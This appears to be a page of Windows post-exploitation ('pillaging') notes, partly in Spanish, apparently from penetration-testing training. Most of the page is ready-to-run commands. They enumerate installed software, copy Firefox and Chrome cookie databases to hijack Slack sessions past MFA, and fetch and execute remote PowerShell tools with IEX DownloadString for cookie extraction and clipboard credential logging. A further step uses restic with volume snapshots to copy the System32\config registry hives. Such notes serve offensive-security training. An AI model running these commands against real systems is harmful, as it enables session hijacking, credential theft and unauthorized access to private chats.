Pillaging

Aplicaciones instaladas

Aprender y entender como las apllicaciones instaladas se conectan con el negocio.

Identifying Common Applications

C:\>dir "C:\Program Files"

Get Installed Programs via PowerShell & Registry Keys

$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

Abusing Cookies to Get Access to IM (instant messaging) Clients

https://github.com/clr2of8/SlackExtract

Aplicaciones IM como Slack o Microsoft Teams. Si comprometemos la cuenta de un usuario y ganamos acceso a un cliente IM, podemos buscar información en chats privados y grupos. Si el usuario usa multi-factor de autenticación o no podemos obtener la contraseña en texto plano podemos intentar robar las cookies del usuario para iniciar sesión en un cliente basado en la nube.

Copy Firefox Cookies Database

https://github.com/juliourena/plaintext/blob/master/Scripts/cookieextractor.py

copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .

https://cookie-editor.com/

python3 cookieextractor.py --dbpath "/home/plaintext/cookies.sqlite" --host slack --cookie d

PowerShell Script - Invoke-SharpChromium

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSh
arpPack/master/PowerSharpBinaries/Invoke-SharpChromium.ps1')
Invoke-SharpChromium -Command "cookies slack.com"

Copy Cookies to SharpChromium Expected Location

copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"

Invoke-SharpChromium Cookies Extraction

Invoke-SharpChromium -Command "cookies slack.com"

Clipboard

https://github.com/inguardians/Invoke-Clipboard/blob/master/Invoke-Clipboard.ps1

Monitor the Clipboard with PowerShell

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/inguardians/Invoke-Clipboard/master/Invoke-Clipboard.ps1')
Invoke-ClipboardLogger

Capture Credentials from the Clipboard with Invoke-ClipboardLogger

Invoke-ClipboardLogger

Roles and Services

Attacking Backup Servers

https://restic.net/

restic - Initialize Backup Directory

mkdir E:\restic2; restic.exe -r E:\restic2 init

restic - Back up a Directory

$env:RESTIC_PASSWORD = 'Password'
restic.exe -r E:\restic2\ backup C:\SampleFolder

restic - Back up a Directory with VSS

restic.exe -r E:\restic2\ backup C:\Windows\System32\config --use-fs-snapshot

restic - Check Backups Saved in a Repository

restic.exe -r E:\restic2\ snapshots

restic - Restore a Backup with ID

restic.exe -r E:\restic2\ restore 9971e881 --target C:\Restore

PreviousOtros archivos NextPrint Operators

Last updated 3 months ago

hashtagAplicaciones instaladas

hashtagIdentifying Common Applications

hashtagGet Installed Programs via PowerShell & Registry Keys

hashtagAbusing Cookies to Get Access to IM (instant messaging) Clients

hashtagCopy Firefox Cookies Database

hashtagExtract Slack Cookie from Firefox Cookies Database

hashtagPowerShell Script - Invoke-SharpChromium

hashtagCopy Cookies to SharpChromium Expected Location

hashtagInvoke-SharpChromium Cookies Extraction

hashtagClipboard

hashtagMonitor the Clipboard with PowerShell

hashtagCapture Credentials from the Clipboard with Invoke-ClipboardLogger

hashtagRoles and Services

hashtagAttacking Backup Servers

hashtagrestic - Initialize Backup Directory

hashtagrestic - Back up a Directory

hashtagrestic - Back up a Directory with VSS

hashtagrestic - Check Backups Saved in a Repository

hashtagrestic - Restore a Backup with ID